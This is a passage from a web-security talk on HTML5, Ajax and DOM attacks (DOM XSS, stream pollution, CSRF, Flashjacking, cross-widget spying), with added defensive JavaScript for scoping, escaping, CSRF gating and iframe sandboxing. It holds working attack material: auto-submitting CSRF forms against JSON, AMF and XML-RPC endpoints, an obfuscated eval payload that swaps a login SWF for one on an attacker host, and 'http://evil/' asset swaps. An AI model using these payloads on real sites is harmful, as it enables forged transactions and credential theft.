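The credential leak on the "By default it's Global" slide and the storage/global scanning idea from slides 19–23, as an added example that is not code from the original deck: the global-assignment form next to a scoped, POST-based form, plus a small audit helper of the kind a DOMTracer-style check would run over `window` or `localStorage`. The XHR object is a constructed stub so the code runs outside a browser; `vulnerableLogin`, `hardenedLogin` and `auditScope` are names assumed here.

```javascript
// Added example, not from the original slides. Names below are assumptions.

// Constructed stand-in for XMLHttpRequest: records requests, sends nothing.
function FakeXhr() { this.requests = []; }
FakeXhr.prototype.open = function (method, url, async) {
  this.requests.push({ method, url, async, body: null });
};
FakeXhr.prototype.send = function (body) {
  this.requests[this.requests.length - 1].body = body;
};

// Vulnerable form. In a sloppy-mode page script `temp = ...` without var/let
// creates window.temp; globalThis.temp is written explicitly here so the
// behaviour is the same whether Node runs this as CommonJS or as a module.
function vulnerableLogin(xhr, user, pwd) {
  globalThis.temp = "login.do?user=" + user + "&pwd=" + pwd;
  xhr.open("GET", globalThis.temp, true);
  xhr.send(null);
  // The password now sits in a URL (server logs, Referer, history) and in a
  // global that any script running in the origin, injected or not, can read.
  return globalThis.temp;
}

// Hardened form: request state stays in function scope, credentials travel in
// a POST body rather than the query string, and nothing is retained afterwards.
function hardenedLogin(xhr, user, pwd) {
  const body = new URLSearchParams({ user, pwd }).toString();
  xhr.open("POST", "login.do", true);
  xhr.send(body);
  return { method: "POST", bodyLength: body.length };
}

// Defender-side check: walk an object's own string-valued properties and
// report keys whose name or value looks like credential material. In a browser
// pass `window`, or Object.fromEntries(Object.entries(localStorage)).
// The pattern is a heuristic, so expect to review the findings by hand.
const SECRET_PATTERN = /(pwd|pass(word)?|token|secret)=?/i;
function auditScope(scope) {
  const findings = [];
  for (const key of Object.keys(scope)) {
    const value = scope[key];
    if (typeof value !== "string") continue;
    if (SECRET_PATTERN.test(key) || SECRET_PATTERN.test(value)) {
      findings.push(key);
    }
  }
  return findings;
}
```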
  • 24. Demo
       DOMTracer and profiling
       Accessing username and password
  • 25. SQL Injection
       WebSQL is part of the HTML 5 specification; it provides an SQL database to the browser itself.
       Allows one-time data loading and offline browsing capabilities.
       Causes security concern and potential injection points.
       The usual SQL injection methods and calls are possible against it
  • 26. SQL Injection
       Through JavaScript one can harvest the entire local database.
       Example
  • 27. DOM – VULNERABILITIES & EXPLOITS
  • 28. DOM Architecture
  • 29. DOM Calls
       [Diagram: Ajax/Flash/Silverlight issue asynchronous calls from the HTML / CSS / RIA and JS / DOM layers through XMLHttpRequest (XHR), asynchronously over HTTP(S), to the Web Server and on to Database / Resource / Middleware; XML / Text comes back.]
• 30. DOM Calls
  Stream types consumed by DOM calls:
    JSON
    XML
    JS-Script
    JS-Object
    JS-Array
• 31. DOM based XSS
  It is a sleeping giant in Ajax applications.
  Root cause:
    The DOM is already loaded.
    The application is a single page and the DOM remains the same.
    New information has to be injected using DOM calls such as eval().
    That information comes from untrusted sources.
• 32. Example cases
  DOM based XSS can take place in several different ways. Examples:
    A simple DOM function uses the URL to drive Ajax calls.
    Third-party content flows into the existing DOM and the call is not secure.
    An Ajax call made by the application: what if we call the link directly? The JSON may cause XSS.
• 33. DOM based URL parsing
  Ajax applications are already loaded, and developers may use a static function to pass arguments taken from the URL. For example:
    hu = window.location.search.substring(1);
  The parameter above (hu, referred to as koko below) then goes into the following Ajax function:
    eval('getProduct(' + koko.toString() + ')');
  Result: DOM based XSS.
• 34. Demo
  Scanning with DOMScan
  Injecting payload in the call
• 35. Third Party Streaming
  [Diagram: the browser (HTML / JS / DOM, Ajax, RIA Flash/Silverlight) loads streams from the Internet (news, weather, mails, bank/trade, RSS feeds, blogs, web services end points) and from the application infrastructure (database, authentication); an attacker-controlled stream reaches eval() and results in XSS]
• 36. Stream processing
    if (http.readyState == 4) {
        var response = http.responseText;
        var p = eval("(" + response + ")");      // the response is executed as code, not parsed as data
        document.open();
        document.write(p.firstName + "<br>");    // fields are written unescaped into the DOM
        document.write(p.lastName + "<br>");
        document.write(p.phoneNumbers[0]);
        document.close();
    }
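As an added example (not code from the talk), the two eval() sinks of slides 33 and 36 rewritten so that the URL parameter and the stream are treated strictly as data; the function names, the escaping helper and the sample streams are assumptions constructed for this example.

```javascript
// Added example (not from the talk): slides 33 and 36 feed a URL parameter and
// then a response stream to eval(). Below both are treated strictly as data:
// the product id is validated, the stream goes through JSON.parse, and every
// field is escaped before it becomes markup.

// Stands in for eval('getProduct(' + hu + ')'): only a decimal integer id is
// accepted; anything else is rejected instead of being executed.
function parseProductId(search) {
  const id = new URLSearchParams(search).get("id");
  if (id === null || !/^\d{1,9}$/.test(id)) throw new Error("invalid product id");
  return Number(id);
}

// Stands in for eval("(" + response + ")"): JSON.parse never runs code, so a
// stream carrying a JavaScript expression fails instead of executing.
function parseStream(responseText) {
  const p = JSON.parse(responseText);
  if (typeof p !== "object" || p === null) throw new Error("stream is not an object");
  return p;
}

// Encode the five characters that matter in HTML text and attribute context.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Stands in for the document.write() chain on slide 36: returns escaped markup
// that the caller assigns once (in a browser, element.textContent per field is
// simpler still and needs no escaping at all).
function renderContact(p) {
  const phone = Array.isArray(p.phoneNumbers) && p.phoneNumbers.length ? p.phoneNumbers[0] : "";
  return [p.firstName, p.lastName, phone].map(escapeHtml).join("<br>");
}

// Constructed sample streams: a clean one and one where a third party has put
// markup into a field (the "polluted stream" of slides 35 and 37).
const CLEAN_STREAM = '{"firstName":"Ada","lastName":"Lovelace","phoneNumbers":["555-0100"]}';
const POLLUTED_STREAM = '{"firstName":"<script>x()</script>","lastName":"Lovelace","phoneNumbers":[]}';
```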
• 37. Polluting Streams
  [Diagram: an attacker sits on the path (proxy on port 8008) between the web client and several web apps, web servers and databases; the XML / JS-Object / JS-Array / JS-Script / JSON stream is polluted, passes through eval() on the client and results in XSS]
• 38. Exploiting DOM calls
  Examples of vulnerable calls:
    document.write(…)
    document.writeln(…)
    document.body.innerHTML=…
    document.forms[0].action=…
    document.attachEvent(…)
    document.create…(…)
    document.execCommand(…)
    document.body. …
    window.attachEvent(…)
    document.location=…
    document.location.hostname=…
    document.location.replace(…)
    document.location.assign(…)
    document.URL=…
    window.navigate(…)
• 39. Demo
  Sample call demo
  DOMScan to identify vulnerability
• 40. Direct Ajax Call
  The Ajax function makes a back-end call.
  The back-end returns a JSON stream (or another format) that gets injected into the DOM.
  In some libraries the content type allows the stream to be loaded directly in the browser.
  In that case the DOM processing is bypassed…
• 41. Demo
  DWR/JSON call – bypassing and direct stream access
• 42. ABUSING SOCKETS, XHR & CSRF
• 43. Abusing network calls
  HTML 5 provides WebSocket and XHR Level 2 calls.
  They allow cross-domain calls and raw socket capabilities.
  They can be leveraged by a JavaScript payload.
  Malware or a worm can use them to perform scanning tasks.
• 44. Internal Scanning
  Allows internal scanning, setting up a backward hidden channel, and opening calls to proxies/caches.
  Some browsers have blocked these calls for security reasons.
• 45. XHR/CSRF ETC.
• 46. XHR – Level 2 calls
  XHR is now at Level 2 in browsers.
  Behaviour differs between browsers.
  XHR Level 2 is already implemented.
  A shared resource policy is implemented: the "Origin" and "Access-Control-*" headers, with decisions based on them.
  Potential abuses:
    One-way stealth channel
    CSRF possible (no cookie though)
    Header changes
  CORS - http://www.w3.org/TR/cors/ (Cross-Origin Resource Sharing)
• 47. CSRF
  CSRF is possible with Web 2.0 streams:
    by abusing DOM calls
    XML manipulations
    CSRF with JSON
    AMF can also be carried as an XML stream (AMFX)
  The attacker injects a simple HTML payload that initiates a request from the browser to the target cross domain.
• 48. How it works?
• 49. JSON
    <html>
    <body>
    <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101/json/jservice.ashx" METHOD="POST">
    <input type="hidden" name='{"id":3,"method":"getProduct","params":{ "id" : 3}}' value='foo'>
    </FORM>
    <script>document.buy.submit();</script>
    </body>
    </html>
• 50. HTTP Req.
    POST /json/jservice.ashx HTTP/1.1
    Host: 192.168.100.2
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    Connection: keep-alive
    Content-Type: text/plain
    Content-Length: 57

    {"id":3,"method":"getProduct","params":{ "id" : 3}}=foo
• 51. HTTP Resp.
    HTTP/1.1 200 OK
    Date: Sat, 17 Jul 2010 09:14:44 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Cache-Control: no-cache
    Pragma: no-cache
    Expires: -1
    Content-Type: text/plain; charset=utf-8
    Content-Length: 1135

    {"id":3,"result":{"Products":{"columns":["product_id","product_name","product_desc_summary","product_desc","product_price","image_path","rebates_file"],"rows":[[3,"Doctor Zhivago","Drama / Romance","David Lean's DOCTOR ZHIVAGO is an exploration of the Russian Revolution as seen from the point of view of the intellectual, introspective title character (Omar Sharif). As the political landscape changes, and the Czarist regime comes to an end, Dr. Zhivago's relationships reflect the political turmoil raging about him. Though he is married, the vagaries of war lead him to begin a love affair with the beautiful Lara (Julie Christie). But he cannot escape the machinations of a band of selfish and cruel characters: General Strelnikov (Tom Courtenay), a Bolshevik General; Komarovsky (Rod Steiger), Lara's former lover; and Yevgraf (Alec Guinness), Zhivago's sinister half-brother. This epic, sweeping romance, told in flashback, captures the lushness of Moscow before the war and the violent social upheaval that followed. The film is based on the Pulitzer Prize-winning novel by Boris Pasternak.",10.99,"zhivago","zhivago.html"]]}}}
• 52. AMF
    <html>
    <body>
    <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101:8080/samples/messagebroker/http" METHOD="POST">
    <input type="hidden" name='<amfx ver' value='"3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null/><string/><string/><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>68AFD7CE-BFE2-4881-E6FD-694A0148122B</string><int>5</int><int>0</int><int>0</int></object></body></amfx>'>
    </FORM>
    <script>document.buy.submit();</script>
    </body>
    </html>
• 53. XML
    <html>
    <body>
    <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
    <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>'>
    </FORM>
    <script>document.buy.submit();</script>
    </body>
    </html>
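As an added example (not code from the talk), a server-side gate for the JSON, AMF and XML-RPC endpoints that the three forms above post to, together with the CORS response policy slide 46 refers to; the allowed origin, the header names beyond those on the slides and the two sample requests are assumptions constructed for this example.

```javascript
// Added example (not from the talk): a server-side gate for the JSON, AMF and
// XML-RPC endpoints the forms above post to. The forged requests have three
// tells, visible in the capture on slide 50: Content-Type: text/plain, a body
// that is really a form pair (the stream followed by "=foo"), and none of the
// headers a same-origin XHR would add. The allowed origin is assumed.
const ALLOWED_ORIGINS = new Set(["https://trade.example.com"]);

function lowerHeaders(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// Returns { allowed, reasons }. Every check is one an HTML form cannot satisfy:
// a form can only send the three form encodings, cannot add custom headers,
// and a cross-site form carries the attacker's Origin (or none at all).
function gateRequest(req, expectedType) {
  const h = lowerHeaders(req.headers);
  const reasons = [];
  const ct = (h["content-type"] || "").split(";")[0].trim().toLowerCase();
  if (ct !== expectedType) reasons.push(`content-type ${ct || "(none)"} is not ${expectedType}`);
  const origin = h["origin"];
  if (!origin || !ALLOWED_ORIGINS.has(origin)) reasons.push(`origin ${origin || "(none)"} not allowed`);
  // A custom header forces a CORS preflight for cross-origin XHR, which
  // corsHeadersFor() below never grants to an unknown origin.
  if (h["x-requested-with"] !== "XMLHttpRequest") reasons.push("missing X-Requested-With");
  if (expectedType === "application/json") {
    let body;
    try { body = JSON.parse(req.body); } catch (e) { body = undefined; }
    if (typeof body !== "object" || body === null) reasons.push("body is not a JSON object");
  }
  return { allowed: reasons.length === 0, reasons };
}

// CORS headers for the preflight: echo only an allow-listed Origin (never "*"
// together with credentials) and name the headers the XHR is expected to send.
function corsHeadersFor(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) return {};
  return { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true",
           "Access-Control-Allow-Headers": "Content-Type, X-Requested-With", "Vary": "Origin" };
}

// Constructed requests: the forged one mirrors slide 50, the genuine one is
// what the application's own XHR would send.
const FORGED_REQUEST = { headers: { "Host": "192.168.100.2", "Content-Type": "text/plain" },
  body: '{"id":3,"method":"getProduct","params":{ "id" : 3}}=foo' };
const GENUINE_REQUEST = { headers: { "Content-Type": "application/json", "Origin": "https://trade.example.com",
  "X-Requested-With": "XMLHttpRequest" }, body: '{"id":3,"method":"getProduct","params":{"id":3}}' };
```

The same gate applied with "text/xml" as the expected type rejects the XML-RPC and AMFX forms for the same reasons, since their Content-Type is also text/plain.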
• 54. Demos
  Simple trade demo – XML-RPC call CSRF.
• 55. FLASHJACKING
• 56. Flashjacking
  Integrated attacks are possible: DOM based XSS + CSRF + Flash.
  A DOM based issue can change the flash/swf file: it can be swapped at run time and the user will not notice.
  Example:
    document.getElementsByName("login").item(0).src = "http://evil/login.swf"
• 57. Double eval – eval the eval
  Payload:
    document.getElementsByName('Login').item(0).src='http://192.168.100.200:8080/flex/Loginn/Loginn.swf'
  Converting it for a double eval so that ' and " etc. can be injected:
    eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,109,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,47,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103,105,110,110,46,115,119,102,39))
• 58. Silverlightjacking
  Integrated attacks are possible: DOM based XSS + CSRF + Silverlight files.
  A DOM based issue can change the xap file: it can be swapped at run time and the user will not notice.
  Example:
    document.getElementsByName("login").item(0).src = "http://evil/login.xap"
• 60. Widgets
  Widgets/Gadgets/Modules are popular with Web 2.0 applications.
  They are small programs that run inside the browser, built from JavaScript and HTML components.
  In some cases they share the same DOM (yes, the same DOM).
  This can create cross-widget channels.
  Exploitable…
• 61. Cross DOM Access
  [Diagram: Widget 1, Widget 2 and Widget 3 (an email widget and an RSS feed reader among them) all live in one shared DOM; the attacker's widget sets a trap in that shared DOM]
• 62. DOM traps
  It is possible to access DOM events, variables, logic etc. across widgets.
  A sandbox is required at the architecture layer to protect against cross-widget access.
  Segregating the DOM with iframes may help.
  Flash-based widgets have their own issues as well.
  Code analysis of widgets is needed before allowing them to load.
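As an added example (not code from the talk), the iframe segregation suggested on this slide: one sandboxed frame per widget and a host-side check on the messages widgets send back; the function names, the widget registry and the placeholder window objects are assumptions constructed for this example.

```javascript
// Added example (not from the talk): isolating a widget in a sandboxed iframe
// and checking the messages it sends back, following the "segregating DOM by
// iframe" mitigation on slide 62. Window objects are plain placeholders here so
// the logic runs outside a browser; names and URLs are constructed.

// Markup for one widget frame. Without "allow-same-origin" the frame gets an
// opaque origin, so the widget's scripts cannot reach the host page's DOM,
// globals or storage even when the widget is served from the host's own domain.
function widgetFrameHtml(name, url) {
  if (!/^[A-Za-z0-9_-]+$/.test(name)) throw new Error("bad widget name");
  if (!/^https:\/\/[^"'<>\s]+$/.test(url)) throw new Error("bad widget url");
  return `<iframe name="${name}" src="${url}" sandbox="allow-scripts"></iframe>`;
}

// Host-side handler for "message" events. A sandboxed frame reports
// event.origin as "null", so the origin string cannot identify the sender;
// event.source is matched against the frames the host itself created instead,
// and only the message types registered for that widget are honoured.
function acceptWidgetMessage(event, frames) {
  const widget = frames.get(event.source);
  if (!widget) return { accepted: false, reason: "unknown source window" };
  const msg = event.data;
  if (typeof msg !== "object" || msg === null || typeof msg.type !== "string")
    return { accepted: false, reason: "message is not a structured object" };
  if (!widget.allowedTypes.includes(msg.type))
    return { accepted: false, reason: `type ${msg.type} not permitted for ${widget.name}` };
  return { accepted: true, widget: widget.name, type: msg.type };
}

// Constructed registry: each frame's contentWindow mapped to what it may ask for.
const rssWindow = {};   // stands in for the RSS frame's contentWindow
const mailWindow = {};  // stands in for the email frame's contentWindow
const WIDGET_FRAMES = new Map([
  [rssWindow, { name: "rss", allowedTypes: ["resize", "open-article"] }],
  [mailWindow, { name: "mail", allowedTypes: ["resize"] }],
]);
```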
• 63. Demo
  Cross Widget Spying
  Using DOMScan to review Widget Architecture and Access Mechanism
  RSS Feed Hacking
  Mashup Hacks
  Cross Domain Callback Hacking
• 65. Security at CODE Level
  JS, Flash or XAP should not carry server-side logic; they should be the presentation layer only…
  Obfuscation may help a bit but is not foolproof.
  Source code and object code analysis are required during blackbox testing.
  Resource discovery and fuzzing are a must for SOAP, JSON and AMF streams.
  Be careful with the HTML 5 implementation.
  DOM based scanning and analysis are required.
  Analyse cross streams and third-party analytics.
• 66. CONCLUSION AND QUESTIONS
  http://shreeraj.blogspot.com
  shreeraj@blueinfy.com
  http://www.blueinfy.com